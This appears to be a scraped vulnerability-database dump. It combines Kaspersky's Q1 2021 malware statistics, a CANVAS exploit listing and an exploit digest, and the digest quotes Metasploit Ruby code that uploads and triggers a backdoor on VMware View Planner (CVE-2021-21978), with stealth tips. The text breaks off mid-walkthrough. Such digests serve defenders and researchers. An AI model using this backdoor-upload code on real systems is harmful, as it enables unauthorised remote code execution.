The developers of another strain of ransomware, Ziggy, not only [published](<https://www.bleepingcomputer.com/news/security/ziggy-ransomware-shuts-down-and-releases-victims-decryption-keys/>) the keys for all victims, but also announced their [intention](<https://www.bleepingcomputer.com/news/security/ransomware-admin-is-refunding-victims-their-ransom-payments/>) to return the money to everyone who paid up.\n\n**Law enforcement successes**\n\nLaw enforcement agencies under the US Department of Justice [seized](<https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware>) dark web resources used by NetWalker (aka Mailto) ransomware affiliates, and also brought charges against one of the alleged actors.\n\nFrench and Ukrainian law enforcers worked together to trace payments made through the Bitcoin ecosystem to Egregor ransomware distributors. The joint investigation resulted in the [arrest](<https://www.bleepingcomputer.com/news/security/egregor-ransomware-affiliates-arrested-by-ukrainian-french-police/>) of several alleged members of the Egregor gang.\n\nIn South Korea, a suspect in the GandCrab ransomware operation was [arrested](<https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-affiliate-arrested-for-phishing-attacks/>) (this family ceased active distribution back in 2019).\n\n### Number of new modifications\n\nIn Q1 2021, we detected seven new ransomware families and 4,354 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q1 2020 \u2013 Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110702/03-en-ru-es-malware-report-q1-2021-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q1 2021, Kaspersky products and technologies protected 91,841 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2021 
([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110733/04-en-malware-report-q1-2021-pc.png>))_\n\n### Attack geography\n\n_Geography of attacks by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110802/05-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 2.31% \n2 | Ethiopia | 0.62% \n3 | Greece | 0.49% \n4 | Pakistan | 0.49% \n5 | China | 0.48% \n6 | Tunisia | 0.44% \n7 | Afghanistan | 0.42% \n8 | Indonesia | 0.38% \n9 | Taiwan, Province of China | 0.37% \n10 | Egypt | 0.28% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 19.37% \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 12.01% \n3 | (generic verdict) | Trojan-Ransom.Win32.Phny | 9.31% \n4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 8.45% \n5 | (generic verdict) | Trojan-Ransom.Win32.Agent | 7.36% \n6 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom\n\nVirus.Win32.PolyRansom | 3.78% \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.93% \n8 | Stop | Trojan-Ransom.Win32.Stop | 2.79% \n9 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.17% \n10 | REvil/Sodinokibi | Trojan-Ransom.Win32.Sodin | 1.85% \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new modifications\n\nIn Q1 2021, Kaspersky solutions detected 23,894 new modifications of miners. 
And though January and February passed off relatively calmly, March saw a sharp rise in the number of new modifications \u2014 more than fourfold compared to February.\n\n_Number of new miner modifications, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110831/06-en-malware-report-q1-2021-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 432,171 unique users of Kaspersky products worldwide. Although this figure has been rising for three months, it is premature to talk about a reversal of last year's trend, whereby the number of users attacked by miners actually fell. For now, we can tentatively assume that the growth in cryptocurrency prices, in particular bitcoin, has attracted the attention of cybercriminals and returned miners to their toolkit.\n\n_Number of unique users attacked by miners, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111053/07-en-malware-report-q1-2021-pc.png>))_\n\n### Attack geography\n\n_Geography of miner attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111128/08-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 4.65 \n2 | Ethiopia | 3.00 \n3 | Rwanda | 2.37 \n4 | Uzbekistan | 2.23 \n5 | Kazakhstan | 1.81 \n6 | Sri Lanka | 1.78 \n7 | Ukraine | 1.59 \n8 | Vietnam | 1.48 \n9 | Mozambique | 1.46 \n10 | Tanzania | 1.45 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000). 
\n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyber attacks\n\nIn Q1 2021, we noted a drop in the share of exploits for vulnerabilities in the Microsoft Office suite, but they still lead the pack with 59%. The most common vulnerability in the suite remains [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), a stack buffer overflow that occurs when processing objects in the Equation Editor component. Exploits for [CVE-2015-2523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2523>) \u2014 use-after-free vulnerabilities in Microsoft Excel \u2014 and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which we've often written about, were also in demand. Note the age of these vulnerabilities \u2014 even the latest of them was discovered almost three years ago. So, once again, we remind you of the importance of regular updates.\n\nThe first quarter was rich not only in known exploits, but also new zero-day vulnerabilities. 
In particular, the interest of both [infosec experts](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) and cybercriminals was piqued by vulnerabilities in the popular Microsoft Exchange Server:\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26855>)\u2014 a service-side request forgery vulnerability that allows remote code execution (RCE)\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26857>)\u2014 an insecure deserialization vulnerability in the Unified Messaging service that can lead to code execution on the server\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>)\u2014 a post-authorization arbitrary file write vulnerability in Microsoft Exchange, which could also lead to remote code execution\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-27065>)\u2014 as in the case of [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>), allows an authorized Microsoft Exchange user to write data to an arbitrary file in the system\n\nFound [in the wild](<https://encyclopedia.kaspersky.com/glossary/exploitation-in-the-wild-itw/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), these vulnerabilities were used by APT groups, including as a springboard for ransomware distribution.\n\nDuring the quarter, vulnerabilities were also identified in Windows itself. In particular, the [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1732>) vulnerability allowing privilege escalation was discovered in the Win32k subsystem. 
Two other vulnerabilities, [CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1647>) and [CVE-2021-24092](<https://nvd.nist.gov/vuln/detail/CVE-2021-24092>), were found in the Microsoft Defender antivirus engine, allowing elevation of user privileges in the system and execution of potentially dangerous code.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111159/09-en-malware-report-q1-2021-pc.png>))_\n\nThe second most popular were exploits for browser vulnerabilities (26.12%); their share in Q1 grew by more than 12 p.p. Here, too, there was no doing without newcomers: for example, the Internet Explorer script engine was found to contain the [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26411>) vulnerability, which can lead to remote code execution on behalf of the current user through manipulations that corrupt the heap memory. This vulnerability was exploited by the [Lazarus](<https://securelist.ru/tag/lazarus/>) group to download malicious code and infect the system. Several vulnerabilities were discovered in Google Chrome:\n\n * [CVE-2021-21148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21148>)\u2014 heap buffer overflow in the V8 script engine, leading to remote code execution\n * [CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>)\u2014 overflow and unsafe reuse of an object in memory when processing audio data, also enabling remote code execution\n * [CVE-2021-21139](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21139>)\u2014 bypassing security restrictions when using an iframe.\n\nOther interesting findings include a critical vulnerability in VMware vCenter Server, [CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>), which allows remote code execution without any rights. 
Critical vulnerabilities in the popular SolarWinds Orion Platform \u2014 [CVE-2021-25274](<https://nvd.nist.gov/vuln/detail/CVE-2021-25274>), [CVE-2021-25275](<https://nvd.nist.gov/vuln/detail/CVE-2021-25275>) and [CVE-2021-25276](<https://nvd.nist.gov/vuln/detail/CVE-2021-25276>) \u2014 caused a major splash in the infosec environment. They gave attackers the ability to infect computers running this software, usually machines inside corporate networks and government institutions. Lastly, the [CVE-2021-21017](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21017>) vulnerability, discovered in Adobe Reader, caused a heap buffer overflow by means of a specially crafted document, giving an attacker the ability to execute code.\n\nAnalysis of network threats in Q1 2021 continued to show ongoing attempts to attack servers with a view to brute-force passwords for network services such as Microsoft SQL Server, RDP and SMB. Attacks using the popular EternalBlue, EternalRomance and other similar exploits were widespread. Among the most notable new vulnerabilities in this period were bugs in the Windows networking stack code related to handling the IPv4/IPv6 protocols: [CVE-2021-24074](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-24074>), [CVE-2021-24086](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24086>) and [CVE-2021-24094](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24094>).\n\n## Attacks on macOS\n\nQ1 2021 was also rich in macOS-related news. Center-stage were cybercriminals who took pains to modify their [malware for the newly released MacBooks with M1 processors](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>). Updated adware for the new Macs also immediately appeared, in particular the [Pirrit family](<https://objective-see.com/blog/blog_0x62.html>) (whose members placed high in our Top 20 threats for macOS). 
In addition, we detected an interesting adware program written in the Rust language, and assigned it the verdict [AdWare.OSX.Convuster.a](<https://securelist.ru/convuster-macos-adware-in-rust/100859/>).\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.ac | 18.01 \n2 | AdWare.OSX.Pirrit.j | 12.69 \n3 | AdWare.OSX.Pirrit.o | 8.42 \n4 | AdWare.OSX.Bnodlero.at | 8.36 \n5 | Monitor.OSX.HistGrabber.b | 8.06 \n6 | AdWare.OSX.Pirrit.gen | 7.95 \n7 | Trojan-Downloader.OSX.Shlayer.a | 7.90 \n8 | AdWare.OSX.Cimpli.m | 6.17 \n9 | AdWare.OSX.Pirrit.aa | 6.05 \n10 | Backdoor.OSX.Agent.z | 5.27 \n11 | Trojan-Downloader.OSX.Agent.h | 5.09 \n12 | AdWare.OSX.Bnodlero.bg | 4.60 \n13 | AdWare.OSX.Ketin.h | 4.02 \n14 | AdWare.OSX.Bnodlero.bc | 3.87 \n15 | AdWare.OSX.Bnodlero.t | 3.84 \n16 | AdWare.OSX.Cimpli.l | 3.75 \n17 | Trojan-Downloader.OSX.Lador.a | 3.61 \n18 | AdWare.OSX.Cimpli.k | 3.48 \n19 | AdWare.OSX.Ketin.m | 2.98 \n20 | AdWare.OSX.Bnodlero.ay | 2.94 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nTraditionally, most of the Top 20 threats for macOS are adware programs: 15 in Q1. In the list of malicious programs, Trojan-Downloader.OSX.Shlayer.a (7.90%) maintained its popularity. Incidentally, this Trojan's task is to download adware from the Pirrit and Bnodlero families. 
But we also saw the reverse, when a member of the AdWare.OSX.Pirrit family dropped Backdoor.OSX.Agent.z into the system.\n\n### Threat geography\n\n_Geography of threats for macOS, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111228/10-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 4.62 \n2 | Spain | 4.43 \n3 | Italy | 4.36 \n4 | India | 4.11 \n5 | Canada | 3.59 \n6 | Mexico | 3.55 \n7 | Russia | 3.21 \n8 | Brazil | 3.18 \n9 | Great Britain | 2.96 \n10 | USA | 2.94 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000) \n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q1 2021, Europe accounted for the Top 3 countries by share of attacked macOS users: France (4.62%), Spain (4.43%) and Italy (4.36%). The most common threats in all three were adware apps from the Pirrit family.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2021, most of the devices that attacked Kaspersky traps did so using the Telnet protocol. 
A third of the attacking devices attempted to [brute-force](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) our SSH traps.\n\nTelnet | 69.48% \n---|--- \nSSH | 30.52% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2021_\n\nThe statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 77.81% \n---|--- \nSSH | 22.19% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2021_\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111259/11-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by location of devices from which attacks were carried out on Kaspersky Telnet traps**\n\n** ** | **Country** | **%*** \n---|---|--- \n1 | China | 33.40 \n2 | India | 13.65 \n3 | USA | 11.56 \n4 | Russia | 4.96 \n5 | Montenegro | 4.20 \n6 | Brazil | 4.19 \n7 | Taiwan, Province of China | 2.32 \n8 | Iran | 1.85 \n9 | Egypt | 1.84 \n10 | Vietnam | 1.73 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky SSH traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111335/12-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps**\n\n** ** | **Country** | **%*** \n---|---|--- \n1 | USA | 24.09 \n2 | China | 19.89 \n3 | Hong Kong | 6.38 \n4 | South Korea | 4.37 \n5 | Germany | 4.06 \n6 | Brazil | 3.74 \n7 | Russia | 3.05 \n8 | Taiwan, Province of China | 2.80 \n9 | France | 2.59 \n10 | 
India | 2.36 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\n### Threats loaded into traps\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 50.50% \n2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26% \n3 | Backdoor.Linux.Gafgyt.a | 3.01% \n4 | HEUR:Trojan-Downloader.Shell.Agent.bc | 2.72% \n5 | Backdoor.Linux.Mirai.a | 2.72% \n6 | Backdoor.Linux.Mirai.ba | 2.67% \n7 | Backdoor.Linux.Agent.bc | 2.37% \n8 | Trojan-Downloader.Shell.Agent.p | 1.37% \n9 | Backdoor.Linux.Gafgyt.bj | 0.78% \n10 | Trojan-Downloader.Linux.Mirai.d | 0.66% \n \n_* Share of malware type in the total number of malicious programs downloaded to IoT devices following a successful attack._\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2021, Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources located across the globe. 
613,968,631 unique URLs were recognized as malicious by Web Anti-Virus.\n\n_Distribution of web attack sources by country, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111405/13-en-malware-report-q1-2021-pc.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious objects that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Belarus | 15.81 \n2 | Ukraine | 13.60 \n3 | Moldova | 13.16 \n4 | Kyrgyzstan | 11.78 \n5 | Latvia | 11.38 \n6 | Algeria | 11.16 \n7 | Russia | 11.11 \n8 | Mauritania | 11.08 \n9 | Kazakhstan | 10.62 \n10 | Tajikistan | 10.60 \n11 | Uzbekistan | 10.39 \n12 | Estonia | 10.20 \n13 | Armenia | 9.44 \n14 | Mongolia | 9.36 \n15 | France | 9.35 \n16 | Greece | 9.04 \n17 | Azerbaijan | 8.57 \n18 | Madagascar | 8.56 \n19 | Morocco | 8.55 \n20 | Lithuania | 8.53 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). 
\n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 7.67% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of web-based malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111435/14-en-malware-report-q1-2021-pc.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2021, our File Anti-Virus detected **77,415,192** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. 
These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 47.71 \n2 | Turkmenistan | 43.39 \n3 | Ethiopia | 41.03 \n4 | Tajikistan | 38.96 \n5 | Bangladesh | 36.21 \n6 | Algeria | 35.49 \n7 | Myanmar | 35.16 \n8 | Uzbekistan | 34.95 \n9 | South Sudan | 34.17 \n10 | Benin | 34.08 \n11 | China | 33.34 \n12 | Iraq | 33.14 \n13 | Laos | 32.84 \n14 | Burkina Faso | 32.61 \n15 | Mali | 32.42 \n16 | Guinea | 32.40 \n17 | Yemen | 32.32 \n18 | Mauritania | 32.22 \n19 | Burundi | 31.68 \n20 | Sudan | 31.61 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111505/15-en-malware-report-q1-2021-pc.png>))_\n\nOverall, 15.05% of user computers globally faced at least one **Malware-class** local threat during Q1.", "cvss3": {}, "published": "2021-05-31T10:00:05", "type": "securelist", "title": "IT threat evolution Q1 2021. 
Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-2523", "CVE-2017-11882", "CVE-2018-0802", "CVE-2021-1647", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21139", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21972", "CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24092", "CVE-2021-24094", "CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-31T10:00:05", "id": "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "href": "https://securelist.com/it-threat-evolution-q1-2021-non-mobile-statistics/102425/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2017-01-11T18:07:43", "edition": 2, "description": "**Name**| ms16_135 \n---|--- \n**CVE**| CVE-2016-0099 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS16-135 SetWindowLongPtr Vulnerability \n**Notes**| CVE Name: CVE-2016-0099 \nVENDOR: Microsoft \nNotes: \nThe vulnerable (and now patched) function is actually xxxNextWindow(), but since \nGoogle mentioned SetWindowLongPtr() in their release, we use that name here. \n \nOlder systems are definitely vulnerable, but we have developed/tested on Win10 Anniversary Update for now. 
\n \nRepeatability: Infinite \nReferences: ['https://technet.microsoft.com/en-us/library/security/ms16-135.aspx', 'https://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html', 'http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255'] \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255 \n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-10T02:00:09", "type": "canvas", "title": "Immunity Canvas: MS16_135", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0099", "CVE-2016-7255"], "modified": "2016-11-10T02:00:09", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms16_135", "id": "MS16_135", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "wallarmlab": [{"lastseen": "2021-08-19T16:35:42", "description": "Welcome to our weekly exploit digest! We should say this hasn't been a big week because guys keep producing exploits for the vulnerabilities discovered in the 1st half of March. Nevertheless, we have some new good arrivals for VMware, MS Windows and Win32 to talk about. 
\n\n### New 4+ scored exploits have arrived for 7 software titles:\n\n * VMware View Planner (v4.6)\n * Win32k ConsoleControl\n * Microsoft Exchange 2019\n * Microsoft Windows Containers DP API\n * SonLogger (v4.2.3.3)\n * LiveZilla Server (v8.0.1.0)\n * CuteNews (v2.1.2)\n\n### Here are the types of new exploiting tools:\n\nFile upload| 2 \n---|--- \nRCE| 1 \nOffset Confusion| 1 \nCryptography Flaw| 1 \nSSRF| 1 \nXSS| 1 \n \n## And the title winners of the week are: \n\n## \n\n## I. The Vicious One\n\n### The title goes to this angry piece of code:\n\n[**VMware View Planner 4.6 Remote Code Execution**](<https://vulners.com/packetstorm/PACKETSTORM:161879>)\n\n[CVE-2021-21978](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21978>) \n**Score: CVSS 7.5** \n**Metasploit +**\n \n \n The versions of VMWare View Planner prior to 4.6 Security Patch 1 contain a remote code execution vulnerability (RCE). \n\nThis module exploits an unauthenticated log file upload within the `log_upload_wsgi.py` file, where an unauthorized attacker with network access to View Planner Harness could upload and execute an arbitrary file in the `logupload` web application.\n \n \n def upload_file(content) \n mime = Rex::MIME::Message.new \n mime.add_part(content, 'application/octet-stream', nil, \"form-data; name=\\\"logfile\\\";filename=\\\"#{Rex::Text.rand_text_alpha(20)}\\\"\") \n mime.add_part('{\"itrLogPath\":\"/etc/http/html/wsgi_log_upload\",\"logFileType\":\"log_upload_wsgi.py\"}', nil, nil, 'form-data; name=\"logMetaData\"') \n res = send_request_cgi( \n 'method' => 'POST', \n 'uri' => normalize_uri(target_uri.path, 'logupload'), \n 'ctype' => \"multipart/form-data; boundary=#{mime.bound}\", \n 'data' => mime.to_s \n ) \n ...\n \n\nSuccessful exploitation of this vulnerability can result in RCE as the apache user inside the `apacheServer` Docker container. Let's look how it's realized.\n\nFirst grab the template file from a clean install with a backdoor section added to it. 
Then fill in the PAYLOAD placeholder with the payload to execute. \n \n \n data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname) \n file_content = File.read(File.join(data_dir, 'log_upload_wsgi.py')) payload.encoded.gsub!(/\"/, '\\\\\"')\n file_content['PAYLOAD'] = payload.encoded \n\nWhen the things are primed, upload the file to the target.\n \n \n print_status('Uploading backdoor to system via the arbitrary file upload vulnerability!')\n upload_file(file_content)\n print_good('Backdoor uploaded!')\n\nThen use the `OPTIONS` request to trigger the backdoor. Technically this could be any other HTTP method including invalid ones like `BACKDOOR`, but for the stealth you better use a legit one. \n \n \n send_request_cgi( 'method' => 'OPTIONS', 'uri' => normalize_uri(target_uri.path, 'logupload') ) ...\n\n### The second place in this category goes here: \n\n[**Win32k ConsoleControl Offset Confusion**](<https://vulners.com/packetstorm/PACKETSTORM:161880>)\n\n[CVE-2021-1732](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1732>),[CVE-2016-7255](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255>) \n**Score: CVSS 7.2 \nMetasploit +**\n \n \n A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\\SYSTEM. \n\nThe flaw exists in how the `WndExtra` field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation. \n\n* * *\n\n## \n\n## II. The Geek of the Week\n\nIn our not so humble opinion, this one is the coolest thing we saw last week. 
It is all about Windows Docker Information Disclosure Vulnerability, and since we love our Docker containers, so\n\n### The title goes to this exploit:\n\n[**Microsoft Windows Containers DP API Cryptography Flaw**](<https://vulners.com/packetstorm/PACKETSTORM:161816>)\n\n[CVE-2021-1645](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1645>) \n**Score: CVSS 6.1 \nMetasploit +**\n \n \n The Windows Data Protection API (DP API) allows applications to encrypt arbitrary data without managing keys. You can pass any data to the API, and it then returns an encrypted blob, or you can reverse an encrypted blob with DP API to recover the plain text. The cryptographic key used is either tied to the user context or is unique to a machine. There was a design issue with DP API in containers which resulted in DP API using the same key in all Windows containers. Additionally, these keys were public in base-image layers published by Microsoft.\n\nThe above vulnerability applies to both user- and machine-key DP API encryption within Windows Docker containers, we used the machine key encryption in our explanations. Typically, a machine key is tied to a (virtual-)machine. Therefore, a machine is not capable of decrypting data encrypted by an application on another device. However, due to a design matter, DP API machine keys used in containers came from the container images. Since Windows Docker images are based on identical base images, the containers\u2019 DP API keys were the same. As long as the base image is public, the DP API keys were public also.\n\nTherefore, DP API operations performed by any Windows container application were ineffective, as the encryption key that was used is public. That is why organizations that used DP API in Windows Docker containers and relied on it to store encrypted data are in a potentially insecure location and should consider this data as compromised.\n\nLets' see how to make this exploit work. 
